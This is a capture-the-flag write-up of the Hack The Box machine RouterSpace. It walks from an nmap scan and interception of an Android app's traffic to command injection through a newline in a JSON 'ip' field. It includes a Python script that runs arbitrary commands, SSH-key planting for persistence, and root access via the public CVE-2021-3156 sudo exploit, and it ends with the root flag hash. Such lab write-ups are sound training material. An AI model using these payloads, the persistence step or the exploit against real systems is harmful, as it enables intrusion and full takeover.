HTB Writeup: RouterSpace

Tech will overtake the world… Just after solving that captcha real quick.

Enumeration

NMAP Scan

# Nmap 7.92 scan initiated Sun Apr 10 19:53:33 2022 as: nmap -sC -sV -T3 -oN nmap.all-port.txt -vv -p- 10.10.11.148
Nmap scan report for 10.10.11.148 (10.10.11.148)
Host is up, received echo-reply ttl 63 (0.078s latency).
Scanned at 2022-04-10 19:53:39 IST for 138s
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTJG10LrPb/oV0/FaR2FprNXTVtRobg1Jwy5UOJGrzjWqI8lNDf5DDi3ilSdkJZ0+0Rwr4/gKG5UlyvqCz07XrPfnWG+E7NrgpMpVKR4LF9fbX750gxK+hOSco3qQclv3CUTjTzwMgxf0ltyOg6WJvThYQ3CFDDeOc4T27YqQ/VgwBT92PWu6aZgWX2oAn+X8/fdcejGWeumU9b+rufiNt/pQ1dGUz+wkHeb2pIaA4WfEQLHB1xF33rTZuAXFDiKSb35EpPvhuShsMPQv6Q+NfLAiENgdy+UdybSNH6k1gmPHyroSYoXth7Pelpg+38V9SYtvvoxQRqBbaLApEClTnIM/IvQba9vY8VdfKYDGDcgeuPm8ksnOFPrb5L6axwl0K2ngE4VHQBJM0yxIRo5dELswD1c9O1tR2rq6MbW2giPl6dx/xzEbdVV6VO5n/prjsnpEs8YvNmnELrt6mt0FkcJQ9ageN5ji3pecKxKTVY4J71yf4+cVZKwpX8xI5H6E=
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
|   256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open  http    syn-ack ttl 63
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 017FE5BB3BCC0B9C531C0B9402C701FC
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-49027
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 71
|     ETag: W/"47-T64tMSKD7uSVSzvAfvdqZJPKFTg"
|     Date: Sun, 10 Apr 2022 14:25:47 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: 90tTo XoP n klD 5 TZ }
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-50696
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Sun, 10 Apr 2022 14:25:46 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-32396
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Sun, 10 Apr 2022 14:25:46 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=4/10%Time=6252E8E8%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=4/10%Time=6252E8E9%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,13E4,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-50696\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Sun,\x2010\x20Apr\x202022\x2014:25:46\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-32396\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Sun,\x2010\x20Apr\x202022\x2014:25
SF::46\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,12D,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-49027\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2071\r\nETag:\x20W
SF:/\"47-T64tMSKD7uSVSzvAfvdqZJPKFTg\"\r\nDate:\x20Sun,\x2010\x20Apr\x2020
SF:22\x2014:25:47\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x2090tTo\x20\x20XoP\x20n\x20klD\
SF:x205\x20TZ\x20}\n\n\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 19:55:57 2022 -- 1 IP address (1 host up) scanned in 143.62 seconds

Important Findings:

  • Web Server at TCP/80
  • SSH Server at TCP/22

User Access

  1. Website visited at TCP/80
  2. An android app was provided on the website named RouterSpace.apk
    1. Static Analysis

      A static analysis was performed using MobSF, no interesting data found.

    2. Dynamic Analysis

      1. The app was loaded onto an Android Emulator with Android API 23 and traffic was intercepted using BurpSuite.

      2. A HTTP Request to the website routerspace.htb was captured. (To make it work, manual entry of domain resolution to HTB IP was appended to /etc/hosts of the Android Virtual Device )

      3. Request

        POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
        accept: application/json, text/plain, */*
        user-agent: RouterSpaceAgent
        Content-Type: application/json
        Content-Length: 16
        Host: routerspace.htb
        Connection: close
        Accept-Encoding: gzip, deflate
                   
        {"ip":"0.0.0.0"}
        

      iv. Response

      HTTP/1.1 200 OK
      X-Powered-By: RouterSpace
      X-Cdn: RouterSpace-13489
      Content-Type: application/json; charset=utf-8
      Content-Length: 11
      ETag: W/"b-ANdgA/PInoUrpfEatjy5cxfJOCY"
      Date: Mon, 11 Apr 2022 00:28:24 GMT
      Connection: close
             
      "0.0.0.0\n"
      

      v. The web server running was vulnerable to Command Execution by adding command in ip key of the JSON request

      POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
      accept: application/json, text/plain, */*
      user-agent: RouterSpaceAgent
      Content-Type: application/json
      Content-Length: 13
      Host: routerspace.htb
      Connection: close
      Accept-Encoding: gzip, deflate
             
      {"ip":"\nid"}
             
      HTTP/1.1 200 OK
      X-Powered-By: RouterSpace
      X-Cdn: RouterSpace-99707
      Content-Type: application/json; charset=utf-8
      Content-Length: 53
      ETag: W/"35-ERWpoCDHm08FgkJsyQjiOS48qOc"
      Date: Mon, 11 Apr 2022 09:07:18 GMT
      Connection: close
             
      "\nuid=1001(paul) gid=1001(paul) groups=1001(paul)\n"
      

      vi. A python script was created to run commands and parse output

      #!/usr/bin/env python3
      import requests
      import json
      import sys
             
      headers = {"Content-Type" : "application/json", "User-Agent":"RouterSpaceAgent"}
      url = "http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess"
             
      def start_rev_shell(command):
          body = {"ip":f"\n{command}"}
          resp = requests.post(url, headers=headers, data=json.dumps(body))
          print(json.loads(resp.text))
             
      if __name__ == "__main__":
          start_rev_shell(sys.argv[1])
             
      

      vii. SSH Key was added to User’s authorized_keys file in order to get a shell access and persistence

      ./remote_shell.py "echo -n $(cat ./routerspace-paul.pub) > /home/paul/.ssh/authorized_keys"
      ssh -i ./routerspace-paul [email protected]
      Last login: Mon Apr 11 07:57:18 2022 from 10.10.14.124
      [email protected]:~$
      

Privilege Escalation

  1. Enumeration was done using linPEASS

       
    ╔══════════╣ Sudo version
    ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
    Sudo version 1.8.31
       
    ╔══════════╣ CVEs Check
       
    [+] [CVE-2021-3156] sudo Baron Samedit
       
       Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
       Exposure: probable
       Tags: mint=19,[ ubuntu=18|20 ], debian=10
       Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
       
    
  2. The remote target is vulnerable to CVE-2021-3156

  3. Exploit available on https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py was downloaded, uploaded on the target and executed to obtain a shell with id=0 (root privileges)

    [email protected] RouterSpace scp -i ./routerspace-paul ./exploit_nss.py [email protected]:/tmp/exploit.py
    exploit_nss.py
       
    [email protected]:~$ python3 /tmp/exploit.py
    # id
    uid=0(root) gid=0(root) groups=0(root),1001(paul)
    # cat /root/root.txt
    9b6cae1c5e9ecf5326deb28ef79543ef
    #
    

The remote target is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related